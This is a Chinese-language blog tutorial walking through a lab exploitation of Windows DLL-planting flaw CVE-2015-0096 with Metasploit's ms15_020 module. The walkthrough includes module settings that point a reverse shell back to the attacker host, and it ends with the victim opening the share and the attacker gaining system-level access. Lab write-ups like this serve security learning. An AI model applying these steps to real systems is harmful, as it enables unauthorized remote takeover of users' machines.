您好,登錄后才能下訂單哦!
這篇文章給大家介紹Microsoft DLL植入遠程代碼執行漏洞CVE-2015-0096方示例分析,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
Microsoft Windows沒有正確處理DLL文件的加載,存在遠程代碼執行漏洞,通過誘使用戶打開遠程WebDAV或SMB共享上的某些文件利用此漏洞,成功利用后可導致加載任意庫。Windows使用.lnk來定義文件或者目錄的快捷方式,可以使用.CPL文件來自定義圖標。問題是,在Windows中,圖標從模塊(或者可執行文件或動態鏈接庫)加載。事實上,.cpl文件實際上是DLL文件。因為攻擊者可以定義哪些可執行模塊會被加載,攻擊者可以利用.LNK文件來執行任意代碼。
入侵主機linux:192.168.1.125
共享文件主機win7:192.168.1.102
受害者主機win7:192.168.1.109
準備好兩臺Windows7的主機環境,搭建好一個,直接拷貝速度更快。
克隆一份Windows7:
在一臺win7主機上的C盤中創建share文件夾,并進行共享。
在第二臺主機上查看是否共享成功。
共享成功后,所需要的環境條件就以達成,接下來使用攻擊機器kali Linux進行攻擊。所使用工具為msf。
搜索相關漏洞:ms15_020
利用相關漏洞模塊:
設置一個反彈shell:
查看需要設置的參數:
設置好參數,設置漏洞利用模塊列表的UNCHOST和UNCSHARE
set UNCHOST 192.168.1.102
設置為文件共享主機地址
set UNCSHARE share
設置共享文件的文件夾,這里主機192.168.1.102在C盤下的share里文件夾開啟了共享,提前創建好共享
set LHOST 192.168.1.125
設置漏洞成功利用后后門連接的地址
Exploit
執行漏洞
生成了幾個文件,我們去生成的目錄下把文件拷貝到共享主機的共享文件夾下:
可能會提示如下:
利用重命名解決問題,記得改回。
受害者訪問共享后,成功了觸發了漏洞。
可以發現入侵者這邊彈回來了一個回話session 1
成功獲取到系統權限。
關于Microsoft DLL植入遠程代碼執行漏洞CVE-2015-0096方示例分析就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。